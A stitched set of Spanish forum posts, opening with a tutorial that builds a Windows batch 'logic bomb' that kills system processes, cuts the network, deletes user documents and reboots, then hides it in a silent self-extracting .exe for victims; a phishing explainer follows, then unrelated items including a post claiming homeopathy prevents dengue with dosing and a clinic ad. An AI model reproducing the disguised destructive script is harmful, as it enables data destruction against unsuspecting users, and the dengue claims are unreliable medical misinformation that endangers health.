Daavaa
Usuario (Argentina)

Bueno chicos, hace rato, bastante tiempo vengo experimentando con bombas lógicas. Para lo que no sepan que es, puede llamarse a un programa, o archivo, un .exe el cual está programado para "X" acción en "X" tiempo en "X" sistema opertivo y en "X" usuario. Cada bomba lógica, es programable por su creador, es decir vos podés programar cuando querés que se active como : -La ejecucion de un programa -Abrir un archivo -Determinada fecha y hora -O simplemente al hacerle doble click Estás bombas suelen ser disfrazadas para que parezcan archivos normales o instalaciones, como dice al principio. Una forma de hacerlo, sencillamente es con un bloc de notas, si esa aplicación que ya viene en todos los windows. Tras un par de comandos de msdos podés programar esta bomba para hacer lo que vos quieras. ¿Algo que ver con el hacking? No, para mi no. El hacking es algo mas avanzado diría yo, esto podría usarse por un "lammer" pare decir "mira, formatié esta pc desde mi casa". No tiene nada que ver con trabajar en redes, ni es conexiones ni tenés que tener nada de conocimiento, con un par de comandos que te sepas listo. Es más podría yo tranquilamente hacer un par y subirlas a algún host de descargas así udstedes lo tienen y se lo mandan a quien quieren y listo, basta con armarse un poco de ingenio y vivesa. En fin, no tiene nada que ver al hacking. ¿Como crear una bomba? Una manera fácil de crear una de estos mounstritos es a través del bloc de notas como dice bien arriba. El primer paso, ya teniendo abierto el bloc de notas es tipiar lo siguiente: @hecho off Esto se pone al principio de toda bomba lógica. El paso siguiente, para borrar y dejar requerimientos libres en la pc (cosa que ami me parece mas cómodo) es cerrar todos los programas abiertos y que se están ejecutando. Esto aligera el proceso e impide a la víctima en pensar que hacer según los programas que cerrés. En mi caso por ejemplo cerraría el explorer.exe y svchost.exe [El comando para cerrar programas es "tasskkill /f /im "nombre"] Entonces quedaría así: @echo off taskkill /f /im explorer.exe taskkill /f /im svchost.exe El paso siguiente es desconectarse de internet, otra manera de liberar recursos y acelerar el proceso. Para es ponemos ipconfig /release (desconecta la IP de todos los servidores) @echo off taskkill /f /im explorer.exe taskkill /f /im svchost.exe ipconfig /release Acá ya tenemos la base, vemos como se desconecta de internet, como cierra el explorer y el svchost. Estos dos programas que se cierran deja sin función a la persona que manipula la PC "infectada". Ya que por lo menos le das click a la cruz y listo, ¿no?. Para evitar eso seguí leyendo abajo. El objetivo de esta bomba, será borrar todos los documentos, no es destructiva pero realmente un dolor de huevos, mas si tenés fotos viejas, lindos recuerdos, documentos importantes, cosas de la facu, del colegio o del laburo. Realmente un garrón. Para borrar carpetas o archivos debemos poner el comando de eliminar, y a continuación el nombre de la carpeta, en caso que sea un archivo, la ruta de donde proviene el mismo. [El comando pare eliminar es del /s /f /q "carpeta o archivo"] Quedaría así: @echo off ipconfig /release taskkill /f /im explorer.exe taskkill /f /im svchost.exe del /s /f /q "Cocuments and Settings" Para completar la fase, pondré que se reinicie la PC. Entonces agregamos "shutdown -r -f -t 01" (para ver mas comandos de shutdown, tipiar en "cmd" "shutdown" y presionar ENTER) Y al terminar, escribimos "exit" para terminar la bomba. El final sería así: @echo off ipconfig /release taskkill /f /im explorer.exe taskkill /f /im svchost.exe del /s /f /q "Cocuments and Settings" shutdown -r -f -t 01 exit Bueno, ya tenemos la base completada, tenemos que hará la bomba al ejecutarse... pero como se ejecuta si es un bloc de notas, en todo caso cuando lo ejecutemos se abrirá el bloc con las lineas que escribimos antes... no hace nada en la pc.... Por eso debemos guardarlo en .bat. Una vez escrito todo, van a archivo, guardar como y le ponen por ejemplo "bomba.bat" y lo guardan Ahora, es hora de disfrazarlo porque no creo que nadie se anime a abrir un archivo desconocido con un icono raro y un nombre con extencion .bat (WTF!) HACIENDO A LA BOMBA UN .EXE Para ser mas creible, se puede hacer un .exe con la bomba. Es decir, hacerle doble click, que parezca una instalacion normal y al finalizar no pasa nada. Al reiniciarse el computador se comenzará a ejecutar la bomba. El primer paso, necesitan el winRar Hacen click derecho al archivo .bat que hicieron tiempito antes y le dan a "añadir al archivo" que al lado esta el icono del winrar y les abrirá una ventana con opciones para añadir el archivo a un .rar Nosotros queremos .exe, asi que al costado de la derecha tildamos la opcion que dice "crear archivo auto-extraible". Verán como el nombre cambia a bomba.exe al tildar esa opción. Como queremos que esta acción sea oculta y no se vea ningun proceso, vamos a ponerlo oculto. Go pestañas "avanzado" y entran a la opcion "autoextraible". Les abre otra ventana aparte, buscan la pestaña "MODO" y tildan donde dice "ocultar todo". En la pestaña "texto e icono" pueden personalizar y cubrir el archivo para ponerle otro icono desde ahí o cambiarle el nombre. (opcional) Al terminar le dan click a "ACEPTAR" y listo, nuestra bomba esta completa. Lo que hará: Al ejecutarse no pasará nada, al reiniciarse la computadora, sin llegar a abrir el explorer ni nada abrirá una ventana de ms-dos, se desconectará de internet y borrará todos los documentos y archivos que estén en "mis documentos". No puede cancelarse. COMO EVITAR ATAQUES DE BOMBAS Es realmente mas fácil de lo que piensan, cuando ven un "portable" muy tentador, nunca lo bajen si tener comentarios a favor antes. Esto les ahorrará bronca, tiempo y archivos Espero que les haya servido. Saludos! Si tenés mas ganás de saber sobre computadoras, conexiones y cursos a vanzados de hacking, NO DUDES EN SEGUIRME y RECOMENDAR MIS POSTS!

Pishing Bueno gente, en este post voy a explicar algo de pishing, que es, como se maneja esto, para que sirve y como evitar caer en una trampa de este tipo. ¿Qué es el "pishing"? Como siempre hago en todos los post explicativos mios, doy mi punto de vista y luego lo que dice la web. Para mi, pishing es una forma mas de estafa, mayormente usado por lammers para robar mas que nada contraseñas a usuarios distraidos o que no tienen conocimiento del tema abusandose de ello. El pishing abarca desde robar contraseñas de correo electrónicos o cuentas en juegos en red hasta robar informacion de bancos, tarjetas de crédito, etc lo que pueden llegar a crear una estafa millonaria. Según wikipedia es esto: Pishing en MSN MESSENGER Uno de los servicios mas utilizados en la red es HOTMAIL, tiene millones y millones de usuarios conectados las 24 horas, brindando múltiples formas de conectarse con otro usuario en cualquier parte de mundo en cualquier momento del dia. Sin duda, una gran forma de comenzar a robar contraseñas de apoco es comenzar de abajo, por ejemplo haciendo pishing de MSN Messenger. Si tenemos acceso diario al ordenador de la víctima que tenemos en mente, es muy fácil hacerlo a través de muy poco conocimiento de HTML. Con la gran cantidad de lammers que hay en la internet hoy en día, se puede conseguir en pocos minutos googleando un pishing para messenger, también conocido como "fake msn". Esto consiste en un basiquísimo programa totalmente copiado de la base del hotmail original, editado un par de lineas en el HTML, su misión es engañar a la víctima a la hora de conectarse al msn. Lo que hace esto es sencillo. Crea una carpeta aparte, donde se encuentra el acceso directo al programa, con un par de dlls, un bloc de notas y archivitos html. Es fácil, las dlls lo que hacen es configurar la acción del programa y es lo que lo hace "funcar". El bloc de notas, vendría a hacer como puedo decirles, un archivo donde se guardarán las cosas buenas () Y los html's son los que le dan esa forma igual al messenger original para que cualquiera caiga en la trampa. El msn fake, al iniciar sesión, el 99% de las veces tira un error (claro, todo programado antes) el cual impide iniciar la sesión. Dentro del bloc de notas que crea esta aplicación, se guarda todo lo que se escribe en el campo de correo y contraseña. Viendolo así, es demasiado fácil. Ayer fuí a la casa de un compañero, estabamos aburrido en la PC y me acordé de mostrarle una foto que tenia un amigo. Decidí conectarme al MSN asi se la pedía, abro el messenger y veo el viejo, creo que era 8.5 me parecio raro pero no le di importancia y trate de conectarme. Me agarro sospecha como mi compañero me insistia para que me conecte ahí. Escribí mi correo y mi password, le dí a inciar sesion, cargo 5 segundos y mando un error muy raro, que no estaba disponible e intente mas tarde. No le di tanta importancia, y me conecté desde hotmail y le pedí al foto por correo electrónico. Al llegar a mi casa, abro el messenger e intento inciar sesión, mi cuenta y mi password han sido hackeadas, me mandan error nose porqé. Tiempo después recordé que mi compañero estaba ansioso para que escriba mi password, el messenger era raro, comenzé a buscar en internet y me aseguraron que fuí víctima del pishing. Pishing en páginas web En páginas web es mas complicado realizar esta forma de estafa, ya que no se puede utilizar las mismas urls. Por ejemplo, me copio los html y los configuro para que todo lo que se escriba en los campos de contrseña y correo se me envién a un bloc de una carpeta. Al elegir la dirección donde quiero subir todo, no puedo poner "www.facebook.com" ya que está ocupada. A lo que recurren los lammers son a servidores gratuitos, mayormente, cambiandole solo una letra a las web's, o escribiendola muy parecidamente. Ejemplos. www.facebook.com www.fachebook,com Es el mismo método que el anterior con MSN, copian toda la base del HTML editando para que lo escrito en los campos se envié a un archivo en la carpeta del FTP en donde subimos la página. El conjunto de estos archivos ya preparados para subir a un hosting suelen llamarse "scam's; facebook; twintter; hotmail, etc En la mayoria de páginas que se entran y tienen que loggearse hay que fijarse detalladamente la direccion en la que entraron, si no tiene nada de mas, ni nada de menos ni nada fuera de lo común o raro. También pueden hacer que en la página oficial, al clickear "login" por ejemplo, los redireccione a su página hosteada para parecer mas original, esto es mas dificil ya que es a causa de un bug mayormente y casi nunca se ve este tipo de cosas. Fase de lammers luego de robar la contraseña • En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrónicos, a través de mensajes de ofertas de empleo con una gran rentabilidad o disposición de dinero ( hoax o scam). En el caso de que caigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como: Datos personales y número de cuenta bancaria. • Se comete el phishing, ya sea el envío global de millones de correos electrónicos bajo la apariencia de entidades bancarias, solicitando las claves de la cuenta bancaria (PHISHING) o con ataques específicos. • El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales son transmitidas a las cuentas de los intermediarios (muleros). • Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevándose éstos las cantidades de dinero y aquéllos —los intermediarios— el porcentaje de la comisión Evitarlo a través de programas y aplicaciones Hay varios programas informáticos anti-phishing disponibles. La mayoría de estos programas trabajan identificando contenidos phishing en sitios web y correos electrónicos; algunos software anti-phishing pueden por ejemplo, integrarse con los navegadores web y clientes de correo electrónico como una barra de herramientas que muestra el dominio real del sitio visitado. Los filtros de spam también ayudan a proteger a los usuarios de los phishers, ya que reducen el número de correos electrónicos relacionados con el phishing recibidos por el usuario. Muchas organizaciones han introducido la característica denominada pregunta secreta, en la que se pregunta información que sólo debe ser conocida por el usuario y la organización. Las páginas de Internet también han añadido herramientas de verificación que permite a los usuarios ver imágenes secretas que los usuarios seleccionan por adelantado; sí estas imágenes no aparecen, entonces el sitio no es legítimo.26 Estas y otras formas de autentificación mutua continúan siendo susceptibles de ataques, como el sufrido por el banco escandinavo Nordea a finales de 2005.27 Muchas compañías ofrecen a bancos y otras entidades que sufren de ataques de phishing, servicios de monitoreo continuos, analizando y utilizando medios legales para cerrar páginas con contenido phishing. El Anti-Phishing Working Group, industria y asociación que aplica la ley contra las prácticas de phishing, ha sugerido que las técnicas convencionales de phishing podrían ser obsoletas en un futuro a medida que la gente se oriente sobre los métodos de ingeniería social utilizadas por los phishers.28 Ellos suponen que en un futuro cercano, el pharming y otros usos de malware se van a convertir en herramientas más comunes para el robo de información. ¿Te interesa el tema?¿Te interesa el hacking?¿Te gustaria aprender mas sobre el phising y como ponerlo en práctica? Seguime, en mi próximo post pondré de como crear un scam a asegurarse que una víctima caiga en la trampa
La prestigiosa revista científica Nature ha publicado el estudio de varios científicos en el NEC Research Institute de Princeton, según el cual demuestran haber roto la barrera de la velocidad de la luz. ¿Estaba Einstein equivocado? Para este experimento, los investigadores manipularon un vapor con átomos irradiados por láser, lo que causó un pulso que se propagó a una velocidad 300 veces superior a la de la luz. De hecho, la impresión que dio es que el pulso ’salió de la cámara antes siquiera de haber entrado en ella’. La teoría de la relatividad de Einstein entra en conflicto con este experimento, ya que especifica que nada puede viajar más rápido que la velocidad de la luz, aunque uno de los investigadores del proyecto señala que su demostración no contradice la teoría de Einstein. De hecho, sólo demuestra que esa ‘leyenda urbana’ que muchos sostienen sobre la teoría de la relatividad y la imposibilidad de superar la velocidad d ela luz es falsa. Como señala esta investigadora llamada Lijun Wang, “nada con masa puede viajar más rápido que la velocidad de la luz”, y los pulsos de ondas que produjeron no tienen masa. Mas Info Fuente
LOS CODIGOS DE BARRAS... Es también coEnocido en Europa como sistema EAN -European Article Numbering o Numeración Europea de Artículos- es un método de codificación que permite identificar casi de inmediato todo tipo de productos mediante un lector especial conectado a una caja registradora informatizada. Las ventajas de que ofrece este sistema son varias: Por un lado le permite a los fabricantes, distribuidores y detallistas mantener un control pormenorizado de los movimientos de sus mercancias, y por otro lado evitar errores de cobro e inútiles esperas del cliente ante la caja, proporcionándole además un detallado listado de sus compras. El código EAN (existen muchos otros, pero ahora solo hablaremos del EAN 13) consta de trece números sobre los cuales figura su correspondiente transcripción en forma de barras. Los dos primeros dígitos representan la asociación que asigna los códigos a las empresas fabricantes y distribuidoras. La Asociación Española de Codificaciópn Comercial (AECOC) tiene atribuido el número 84, por lo que los códigos de todos los artículos producidos por empresas españolas empiezan por esta cifra. Las cinco posiciones que siguen a la clave del país corresponde al código asignado a la empresa, mientras las cinco siguientes están reservados para designar el producto concreto, numerado por el propio fabricante o distribuidor. El último dígito es una cifra de control, que resulta de aplicar un algoritmo matemático a los otro doce dígitos. Si en el proceso de lectura del código de barras el número de control no coincide con el resultado de las operaciones indicadas por el algortimo -que la caja registradora efectúa casi de forma instantánea-, esto significa que se ha producido un error y el sistema pide una nueva lectura. Cada uno de los dígitos está representado como un grupo de siete módulos de tonalidades claras y oscuras repartidas de manera que cada dígito está formado siempre por dos zonas claras y dos oscuras de anchura variable, según el número de módulos contiguos de un mismo tipo. Esta anchura variable es la que permite que el dispositivo lector decodifique las barras del sistema EAN.
BRASIL UTILIZA LA HOMEOPATÍA PARA ENFRENTAR EL DENGUE COMO PREVENTIVO Y PARA EVITAR HEMORRAGIAS Sustancias de una planta, un mineral y veneno de cobra, evitó la enfermedad en el 80% de los pacientes. Al igual que nuestro país, Brasil se ve afectado casi todos los años por los brotes de dengue. Solo en el último mes se registraron cerca de 3.212 casos en el estado de Espíritu Santo, según reveló EFE. Como una medida disminuir los casos, la Agencia Nacional de Vigilancia Sanitaria de Brasil (Anvisa) registró un remedio homeopático contra esta enfermedad, que será comercializado sin necesidad de receta. El medicamento, conocido como Proden y desarrollado por el médico e investigador de la Facultad de Medicina de San José de Río Preto Renan Marino, ya fue administrado en el 2007 a los habitantes de esta localidad. Acción terapéutica Según el galeno, el 80% de los pacientes que tomaron este remedio no contrajeron dengue. De acuerdo al sitio oficial de Proden, uno de los componentes, eupatorium perfoliatum, sirve para el tratamiento de fiebres intermitentes, espasmos musculares y dolores reumáticos. Otro de los compuestos, fosforus, ejerce, a través de su acción hepatrópica, el mantenimiento y la integridad de los factores de coagulación, mientras que el crotalus horridus (veneno de cobra), es la síntesis más similar al cuadro hemorrágico del dengue. El médico naturista paraguayo, especialista en fitocomplejos, Jorge Aníbal Duarte, asevera que la combinación de estos compuestos bloquea el mecanismo de obtención energética del virus, limitando los procesos enzimáticos del mismo lo que menoscaba su posible reproducción. Asimismo, Marino indica que las investigaciones demostraron que ingerir el remedio, sin padecer la enfermedad, cumple un efecto de protección, y quien ya presenta un cuadro de dengue, puede evitar los problemas hemorrágicos. “Con este compuesto la enfermedad puede durar de cinco a siete días”, especifica. Normalmente la dolencia se puede alargar durante dos y tres semanas Este artículo salió en el Diario La Nación , de Paraguay el dia 13/2/2009 , ya hace un tiempo. http://www.spanish.xinhuanet.com/spanish/2009-02/19/content_820047.htm En este link está el laboratorio Almeida Prado que lo produce en Brasil Produce Brasil la primera medicina natural contra el dengue 19.02.2009 Actualizado a las 09:09:05 RIO DE JANEIRO, 18 feb (Xinhua) -- Las farmacias de Río de Janeiro comenzaron a comercializar esta semana el primer remedio de origen natural desarrollado en Brasil para combatir los síntomas del dengue, informó hoy la privada Agencia Estado. El compuesto homeopático tiene como base una sustancia extraída de veneno de la serpiente cascabel. El medicamento fue aprobado por la Agencia Nacional de Vigilancia Sanitaria (Anvisa) a finales del año pasado y su distribución se inició por las farmacias de Río de Janeiro. El llamado Proden, desarrollado y patentado por el Laboratorio Homeopático Almeida Prado, facilita la recuperación de los pacientes que contraen la enfermedad y ayuda a prevenir la molestia, según el farmacéutico Ezequiel Viriato, uno de los responsables de la elaboración de la nueva medicina. "La píldora no causa efectos colaterales y reduce significativamente el tiempo de recuperación de los pacientes", añadió Viriato. Por ser un producto natural, que al parecer no provocar efectos secundarios, la Anvisa autorizó su venta sin la exigencia de receta médica. El fármaco fue desarrollado por el médico Renan Marino, investigador de la Facultad de Medicina de Sao José do Río Preto, luego de que una epidemia de dengue afectara ese municipio del estado de Sao Paulo. Según Marino, 80 por ciento de las cerca de 20.000 personas a las que fue distribuida la medicina de manera experimental, se salvó de contraer la enfermedad pese a vivir en áreas de riesgo y próximas a criaderos del mosquito "Aedes aegypti". Además de prevenir la enfermedad, pese a no ser una vacuna, el Proden también sirve para el tratamiento del dengue. El veneno de serpiente es uno de los principales componentes de la nueva medicina, y según Marino "una persona que es mordida por la serpiente tiene hemorragia. Pero cuando el veneno es usado en medidas homeopáticas, puede revertir ese efecto". "En las pruebas que hicimos demostramos que los animales tratados recuperaron plaquetas sanguíneas", añadió Marino. La medicina ya fue utilizada por la alcaldía de Macaé, ciudad en el norte del estado de Río de Janeiro, para combatir una epidemia. El dengue dejó poco más de un centenar de muertos en todo el estado de Río de Janeiro en el verano del año pasado. El remedio, que se presenta en cajas con hasta 30 comprimidos, está siendo vendido en las farmacias de Río de Janeiro por cerca de 30 reales (unos 12,8 dólares). Por recomendación médica, las personas que ya contrajeron la enfermedad debe tomar cerca de tres comprimidos diarios durante diez días. Que es el Proden y como se puede preparar. Los medicamentos homeopáticos son baratos, y se preparan de la siguiente forma: Como curativo. Eupatorium 6x + Phosphorus 6c + Crotalus horridus 6c Se toman 10 gotas o globulos 4 o 5 veces al dia COMO PREVENTIVO Eupatorium 200c + Phosphorus 200c + Crotalus horridus 200c Se toman tipo vacuna 10 gotas o glóbulos por dia o dia por medio. En caso de ser necesario pidan una receta a su médico o pueden pedirla por FAX O e mail a nuestro centro. Esto es de suma importancia,sobre todo la prevención en los que ya tuvieron dengue o para evitar el dengue hemorrágico. CENTRO MEDICO R E V I T A L I Z A R E® Corrientes 846 Resistencia Chaco Argentina TE 03722 427446 Móviles 03722 15335588 y 15545198
Historia de la Torre Eiffel. La historia de la Torre Eiffel comenzó en el año 1855, cuando Eiffel consiguió el permiso para construirla para la Exposición Universal de París que había de celebrarse en el año 1889. Casi cien personas se presentaron al concurso de ideas con el que se pretendía construir un monumento conmemorativo acorde con los tiempos de progreso que se estaban viviendo en París. Se quería dar una imagen al mundo de modernidad, y finalmente el elegido fue Gustave Eiffel, quien presentó un proyecto cuyo material de construcción básico era el hierro laminado. Más de 18.000 piezas de ese material y casi dos millones y medio de remaches hicieron falta para levantar una torre de 312,27 metros de altura. Sin embargo, y a pesar de tratarse de una obra de gran envergadura, apenas se requirieron veintiséis meses de trabajo para acabarla. Los estudios sobre el proyecto se iniciaron en 1884, pero no se comenzó a construir hasta 1887, acabándola poco antes de la inauguración de la Exposición Universal en 1889. Curiosamente, se pretendía desmontar la torre al acabar la exposición, máxime cuando su presentación al pueblo levantó una tremenda controversia producto del rechazo popular a una obra que no se entendía. Se estimaba que era demasiado modernista y que no pegaba con una ciudad de marcado estilo renacentista. Su autor fue vilipendiado, y su gran obra sólo se salvó cuando se hicieron pruebas de transmisión radiofónica por la Armada Francesa desde la misma torre y se comprobó que funcionaban perfectamente. Su utilización como emisor y receptor y para la colocación de las antenas, que elevaron su altura hasta los 324 metros, hicieron que poco a poco el pueblo se acostumbrara a verla y que llegaran los tiempos en que se apreció el verdadero valor de la que hoy es el símbolo de Francia en todo el mundo.
EL FUERTE APACHE UBICACION GEOGRAFICA Es un complejo de 26 manzanas en el cual conviven aproxidamente unas 100 mil personas distrubuidas entre 13 "Nudos" y 50 "tiras" que esta delimitado entre las calles : República Arabe Siria, Teniente Richieri, Avenida Militar y Juan José Paso de Ciudadela Norte. Los "Nudos" estan compuesto por 4 torres, 3 de ellas con edificion que van de 11 a 13 pisos y la cuarta y ultima es una torre de agua. En el barrio solo hay 13 "nudos" distrubuidos a lo largo y ancho de estas hectareas. El barrio ademas esta constituido por "tiras" y accesos que son pilas largas de edificios que llegan a tener 3 pisos y estas son las que realmente llenan los espacios de las 26 manzanas, van desde la "tira" Nº1 hasta la Nº 50 y mas, (Las tiras que van desde los Nº1 hasta Nº13 se encuentran cerca de los "Nudos".Ademas en los ultimos años se ha formado una villa denominada "La villa de los rusos" que se encuentra cerca de los "Nudos" 11, 12 y 13. En Noviembre del año 2000 los "nudos" 8 y 9 fueron demolidos ya que habia peligro de derrumbe para ellos. Historia Del Nombre Fuerte Apache "Fuerte Apache" nació del periodista José de Zer, aquel que trabajaba en Nuevediario y perseguía a los asesinos, el nombre surgió el día que el periodista cubrió un tiroteo en frente a la comisario atrincherada en alucion a su peligro con el Fuerte apache del Bronx. No Todo Es Delicuencia Dentro del barrio hay dos escuelas La Media Nº 7 con primaria y secundaria y la Tecnica Nº 50, en ambas se dictan clases a la noche para adultos que no terminaron la escuela primaria. Tambien hay centros de reunion donde se debaten ideas para mejorar la estructura del barrio. Dentro de uno de estos centros se compone la murga del barrio donde los chicos pueden distraerse, bailar y tocar libre de drogas, ademas de las escuelas y centros hay 3 clubes de futbol : Mi Refugio, El Triangulo y Santa Clara (Club donde se inicio Carlos Tevez)en el cual los chicos juegan campeonatos barriales matendiondoslos lejos de la delicuencia. De la villa a los monoblocks El barrio Ejército de los Andes, co- nocido como Fuerte Apache, fue construido en los meses previos al mundial de fútbol de 1978 para al- bergar a miles de desplazados de las villas de emergencias porteñas. Las familias pobres fueron trasladadas al lugar como parte de una campaña destinada a mejorar la imagen de la ciudad, que encaró el entonces inten- dente dictatorial, el ex brigadier Os- valdo Cacciatore. Los por entonces flamantes depar- tamentos destinados a familias ca- renciadas fueron escriturados, por ello el complejo es propiedad privada y resistió distintos intentos de demo- lición, como el anunciado en 1996 por el ex gobernador Eduardo Du- halde. En el complejo de 26 hectáreas conviven unas cien mil personas, dis- tribuidas en monoblocks, 13 “nudos” y “tiras”, estos últimos anexados pos- teriormente. La descomunal cantidad de habitantes atentó contra los in- muebles, los que a simple vista mues- tran un grado de deficiencias estruc- turales que hacen peligrosa la perma- nencia en los departamentos. IMAGENES: VIDEOS: link: http://www.videos-star.com/watch.php?video=SbVCZKCJAgQ&feature=related link: http://www.videos-star.com/watch.php?video=Uuje6nTCa3Y Canciones de la banda de Rap HipHop de fuerte apaceh,se llama FA

Tenes muchos diskettes de 3 1/2 y no sabes en que usarlos? Para!, no los tires! Armemos un lapicero!. MATERIALES * 5 Diskettes de 3 1/2 * Precintos chicos * Agujereadora (aunque podemos agujerear con otra cosa, ya que es plastico) 1) Realizamos 2 perforaciones a ambos lados la parte inferior del diskette 2) Ahora vamos a unirlos con los precintos 3) Y por ultimo, colocamos la base Y listo! Suerte! Daavaa

Necesitamos 10 potes vacios de YAKULT, ACTIVIA o cualquiera de esos yoghurts pequeños 1 Pedazo de papel de aluminio. 1 Carton de 66 cm x 100 de largo. 1 Marcador Los potecitos de yoghurt, van a ser los pinos, para ellos, debemos quitarles las etiquetas y podemos hacer algun dibujo con marcador sobre ellos. Con el papel aluminio haremos la famosa "bola" Nos quedara algo asi: Ahora lo mas importante....la "cancha". Para ello, necesitamos el carton de 66x100 cm, el cual le haremos una marca para doblarlo. Podemos dibujarle dentro las 10 ubicaciones de los 10 pinos y alguna otra decoracion que deseemos. Una vez que marcamos el carton con el marcador, procedemos a doblarlo. El doblez, debe hacerse asi: Nuestro campo de bowling quedaria asi: Listo! ya tenes las zanjas donde caera la "bola" si efectuaste un mal tiro. Desafia a tus amigos este finde! Saludos!
Líderes mundiales reclaman un "cese inmediato del fuego" Francia, Egipto, Rusia y la Unión Europea llamaron al “cese inmediato” de la violencia en la zona, luego del ataque aéreo israelí a Palestina que causó al menos 155 muertos y más de 200 heridos. En tanto, los países árabes agrupados en la ONU pidieron una reunión urgente del Consejo de Seguridad, para tomar una posición sobre el tema. Los líderes mundiales pidieron hoy un alto el fuego en Franja de Gaza luego del ataque aéreo israelí a esa zona de los territorios palestinos que causó al menos 155 muertos y más de 200 heridos. El presidente francés, Nicolas Sarkozy, pidió hoy el "cese inmediato" de la violencia en Israel y Gaza, a la vez que instó a terminar con "los lanzamientos de misiles sobre Israel, así como los bombardeos israelíes en Gaza", según una nota oficial divulgada hoy por el palacio del Eliseo. En tanto, el alto representante para la política exterior europea, Javier Solana, pidió hoy -a través de un vocero- "el cese el fuego inmediato en Gaza", indicó la agencia de noticias italiana ANSA. "Estamos muy preocupados por los acontecimientos de Gaza. Pedimos un alto el fuego inmediato y emplazamos a todos a ejercer la máxima contención", afirmó Solana. Por su parte, la presidencia egipcia "condena las agresiones militares israelíes contra la Franja de Gaza y responsabiliza a Israel, como fuerza de ocupación, por el número de víctimas y heridos de esta agresión". El Cairo fue mediador en la tregua de seis meses entre Israel y 12 organizaciones palestinas de la región que concluyó la semana pasada. Además, el gobierno egipcio ordenó la apertura del paso fronterizo de Rafah con la Franja de Gaza y el envío de decenas de ambulancias y equipos médicos para transferir a los heridos de los ataques israelíes. A su vez, el gobierno ruso, en la voz de su vocero Andrei Nesterenko, invitó a Israel a cesar inmediatamente "la operación a gran escala" contra Gaza, y a Hamas a poner fin al lanzamiento de misiles contra territorio israelí, indicó la agencia de noticias rusa Itar-Tass. En tanto, el grupo de países árabes en las Naciones Unidas pidió una reunión extraordinaria del Consejo de Seguridad para que tome posición "sobre la agresión israelí en Gaza", indicó el secretario general de la Liga Arabe, Amr Mussa.